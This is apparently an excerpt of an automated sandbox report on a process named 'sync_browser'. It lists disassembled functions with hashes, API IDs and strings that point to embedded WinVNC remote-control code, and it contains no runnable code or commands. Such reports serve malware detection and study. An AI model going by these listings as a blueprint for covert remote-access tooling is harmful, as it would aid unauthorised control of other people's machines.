                                                                    Function 00007FF6DC18285C Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                                                                    • String ID:
                                                                    • API String ID: 3283625137-0
                                                                    • Opcode ID: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                    • Instruction ID: d5100b54ee26b385ce08d9e1e15bf5f2f7aa63f4bc3f8b664943a3de07884e84
                                                                    • Opcode Fuzzy Hash: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                    • Instruction Fuzzy Hash: 3021B621E0C7A995FA159B55EC416AEB398FF44B90F844236EE6D837D6CF3CE0628700
                                                                    Function 00007FF6DC0D3FB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ComputerLibraryLoadName
                                                                    • String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
                                                                    • API String ID: 2278097360-3189507618
                                                                    • Opcode ID: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
                                                                    • Instruction ID: de52db942e415ead4465d3c7e34e9c96b3f604d5b7308b9bdc7dcaa2490241df
                                                                    • Opcode Fuzzy Hash: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
                                                                    • Instruction Fuzzy Hash: 3031E221B09B5A81FB54DB2AF85032D2794EF89B44F00413AC64E973E5EF3EC066C380
                                                                    Function 00007FF6DC12A320 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessWindow$CurrentFindMessagePostThread
                                                                    • String ID: WinVNC Tray Icon
                                                                    • API String ID: 2660421340-1071638575
                                                                    • Opcode ID: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                    • Instruction ID: e3a812ddd260107d2755783968f3c2f59298ac92b73acdaf478e14f06db36576
                                                                    • Opcode Fuzzy Hash: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                    • Instruction Fuzzy Hash: B701F221608B9581E7009B52BC505AAB668FF89BD4F144036DE4E83B24DE3CD497C700
                                                                    Function 00007FF6DC0E33A0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 85COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    • vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF6DC0E3429
                                                                    • vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF6DC0E3502
                                                                    • vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF6DC0E3490
                                                                    • vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF6DC0E33D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
                                                                    • API String ID: 1452528299-2001727811
                                                                    • Opcode ID: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
                                                                    • Instruction ID: 36540a134be234d106b63e79e9807173ac9b3651486575653cb2efadd6a3fcda
                                                                    • Opcode Fuzzy Hash: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
                                                                    • Instruction Fuzzy Hash: 5041F966A05A8A81EB509F26C4887FD27A8FBC4F44F584072CE0DC77A5DF3AD59AC310
                                                                    Function 00007FF6DC0E88A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
                                                                    • String ID: <unavailable>
                                                                    • API String ID: 4131039871-1096956887
                                                                    • Opcode ID: 8b55b09e85d7b53b89b4cd63b014f510ade4f7f6fe36729922b2c1c6a87ebc0f
                                                                    • Instruction ID: b450d35e20007788e841b3985c079321a0847610430afdcb1705fc40c651a99e
                                                                    • Opcode Fuzzy Hash: 8b55b09e85d7b53b89b4cd63b014f510ade4f7f6fe36729922b2c1c6a87ebc0f
                                                                    • Instruction Fuzzy Hash: 14316132618B85C2E754DF14E8443AD73A8FB88B94F140236DAAD877A4DF3DD466CB40
                                                                    Function 00007FF6DC12CD40 Relevance: 6.1, APIs: 4, Instructions: 52networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: connectgethostbynamehtonsinet_addr
                                                                    • String ID:
                                                                    • API String ID: 599670773-0
                                                                    • Opcode ID: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
                                                                    • Instruction ID: 9194047bda953d77e42d5e1188389c37b57069d69c1d1b61fa54b511fcea0b0d
                                                                    • Opcode Fuzzy Hash: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
                                                                    • Instruction Fuzzy Hash: 91117226A18A6981FB648B25EC6133D62A4FF88B95F004236EA5EC7794DF3CD512C744
                                                                    Function 00007FF6DC177978 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _callnewh_errno$AllocHeapmalloc
                                                                    • String ID: bad allocation
                                                                    • API String ID: 3727741168-2104205924
                                                                    • Opcode ID: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                                    • Instruction ID: 7d594ba949702b9d6d2d513b46c1808926567b5383bea94680519428812f85e8
                                                                    • Opcode Fuzzy Hash: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                                    • Instruction Fuzzy Hash: F4012E20E0976FD1FA119B50EC401BC2368BF84390F640233D54EC66A1EE6CE16BDB40
                                                                    Function 00007FF6DC12A290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FindMessagePostWindow
                                                                    • String ID: WinVNC Tray Icon
                                                                    • API String ID: 2578315405-1071638575
                                                                    • Opcode ID: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                                    • Instruction ID: 8f66d5af2e07927209b673e6276dd75710bf7ce4d44474e2fb81066d3546d744
                                                                    • Opcode Fuzzy Hash: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                                    • Instruction Fuzzy Hash: 08018435E2C65582EB648B02F85026D6294FB89BC8F585032EE5EC3759DE7CD8A78B00
                                                                    Function 00007FF6DC12CC40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketshutdown
                                                                    • String ID: vsocket.cpp : closing socket
                                                                    • API String ID: 572888783-2569437896
                                                                    • Opcode ID: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                                    • Instruction ID: 0597bf61e03bbc87b0ba68c2e27227a91b15a00d6d86abfc1bc10e3bae2b93ef
                                                                    • Opcode Fuzzy Hash: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                                    • Instruction Fuzzy Hash: 3DF04975A10B5A82EB249F74C8A43AD3324FF88B15F204636CE2E862E5DF38D467C351
                                                                    Function 00007FF6DC157A70 Relevance: 5.1, APIs: 4, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLast
                                                                    • String ID:
                                                                    • API String ID: 918212764-0
                                                                    • Opcode ID: 03b786ac0191571c2e0cd19829045d780b45d4398104a6852bd75eb283c44f71
                                                                    • Instruction ID: 327c7cf6f058ec72e2217298ffddbe9e9e915537dd4f2caf784c413c02448297
                                                                    • Opcode Fuzzy Hash: 03b786ac0191571c2e0cd19829045d780b45d4398104a6852bd75eb283c44f71
                                                                    • Instruction Fuzzy Hash: 36210A36E29A6A86EB519F20E85537D63A8FF44B44F140132EA4E83654DF3CD467CB80
                                                                    Function 00007FF6DC12DD90 Relevance: 4.6, APIs: 3, Instructions: 86networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: selectsend
                                                                    • String ID:
                                                                    • API String ID: 2999949978-0
                                                                    • Opcode ID: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                                    • Instruction ID: c55af4c3921e673c78304dc771524c1eedd1ba4d5cfc11a98b347626ed2bbf9b
                                                                    • Opcode Fuzzy Hash: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                                    • Instruction Fuzzy Hash: 5C315B26A19AAA46FAB05F15EC557BEA398FF96748F040132ED4D83A90CF3DD423C640
                                                                    Function 00007FF6DC189234 Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocHeap_callnewh_errno
                                                                    • String ID:
                                                                    • API String ID: 849339952-0
                                                                    • Opcode ID: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                                    • Instruction ID: ca28ca702a662fc726bba0a8e9c2df27c641a75f87238c492dfdb3985a020da6
                                                                    • Opcode Fuzzy Hash: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                                    • Instruction Fuzzy Hash: A411E521B0D26A91FE564B51DE04B7C76DA9F807F4F088A32D91DC6AC4DE2CA4638340
                                                                    Function 00007FF6DC0D4140 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
